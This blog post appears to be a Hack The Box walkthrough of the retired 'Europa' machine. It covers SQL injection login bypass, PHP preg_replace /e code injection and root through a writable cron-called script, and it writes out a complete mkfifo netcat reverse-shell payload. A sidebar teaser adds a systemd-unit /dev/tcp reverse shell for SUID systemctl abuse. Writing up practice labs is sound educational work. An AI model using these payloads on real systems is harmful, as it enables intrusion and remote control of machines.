Skip to main content

Hackthebox.eu - Retired - Europa


Hackthebox.eu - Retired - Europa


Recon


As always I start with a simple UP/Down scan on all TCP ports.
$ nmap -T4 -p- -oX ./nmapb.xml europa.htb


Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html



Ports 22, 80 and 443 open..

Looks like this box is going to be mostly web based

Let's run nmap again with the -A switch to run all scripts against these three ports

$ nmap -T4 -A -p22,80,443 -oX ./nmapf.xtml europa.htb

Then we will convert that output to HTML also
xsltproc ./nmapf.xml -o ./nmapf.html





Looks like we have an Ubuntu box running a fairly new version of OpenSSH on port 22 and Apache 2.4.18 on 80 and 443


Let's check out those Apache sites

Both are just the default Apache install page

Got a little bit more info from the certificate on 443


Europacorp.htb should be the box

I ran a bunch of scans at these two domains
Europa.htb
europacorp.htb

Tried Dirb and Dirbuster and didn't find anything…

Looking back at the nmap results I see this


Admin-portal.europacorp.htb

Also in the cert we found this email address

admin@europacorp.htb



Exploit





Woot we got a login page

Tried some generic SQLI here but didn't get anywhere in the browser. It wouldn't let me do anything with the email address




What about if we try it with burp to get around that silly data validation.


We got a redirection


We are in.



None of the links on the dashboard are real, they just link back to the dashboard.php.

However there is this tools section.

Which would let a user input an IP address,presumably the IP address of the OPENVPN server and the tool would generate a OpenVPN config file to connect up to the company VPN…

But as an attacker what do we have here?. A way to input some data and the server interacting with that data hopefully we can use this to get our foothold.

This is what the request looks like in burp



If we look at the code used in the generate we can see this hidden input



There is a field named pattern with /ip_address/ as the value

Since that is surrounded by / / 's it make me think there might be some regex involved in the the code that is generating the config

There is a fairly well know depreciated modifier in php preg_replace



Here is a blog about why this is depreciated.



If we can insert /e in the pattern field then whatever comes after it will be will be evaluated as a PHP expression….

So we can use our input to insert PHP code in our request..


So let's try to ping our VPN IP

So in php that would look like this

system('ping -c 10.10.14.42')

For this to work we are going to need to encode those spaces in our command

We can just put in a + sign for the spaces

So it would then look like 
system('ping+-c+10+10.10.14.42')

So first let's setup a listener on our 

sudo tcpdump -i tun0 -n icmp

So tcpdump on just interface tun0 and only showing ICMP

Here is what I ended up with for my request

pattern=%2Fchanged%2Fe&ipaddress=system('ping+-c+10+10.10.14.42')&text=changed


And my TCPDUMP


Ok so Proof of concept work there..

Let's try to get a shell

I tired a couple but finally had luck with a mkfifo shell

So it would start by looking like this

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Then of course we need to edit that for our VPN IP

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10 1234 >/tmp/f
Now we need ot  URL encode

I use this website to do it

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff

Before we try to send this to the tools.php we need to setup our listener


$ nc -lnvp 5555

Here is my final request

pattern=%2Fchanged%2Fe&ipaddress=system('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff')&text=changed

Sent that to tools.php using burp annnnnnnnnddddddddd


We got a shell, we got a shell, we got a shell hey hey hey hey

1930S GIF



Poking around the system and we already can get the user flag

In the /home/john folder





I used wget to xfer linenum.sh to the europa box

I saw this in the output ( after I gave it execute rights)




Here is a job that runs every minute as root.. Coool

Lets see what it does

$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

So it looks like it blanks out the access.log……

But then it calls a script in /var/www/cmd/
Named logcleared.sh

Lets see what is in that script


Nothing, it doesn't exist but it looks like we have right access to this folder so we can make one :)


So I made one with this line


cat /root/root.txt  >> /tmp/circusmonkey/root.txt

Copied it over using wget and my SimpleHTTPServer 

Waited a minute

The cat'd the file


Running Late Cut You Off GIF by Saturday Night Live


















Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more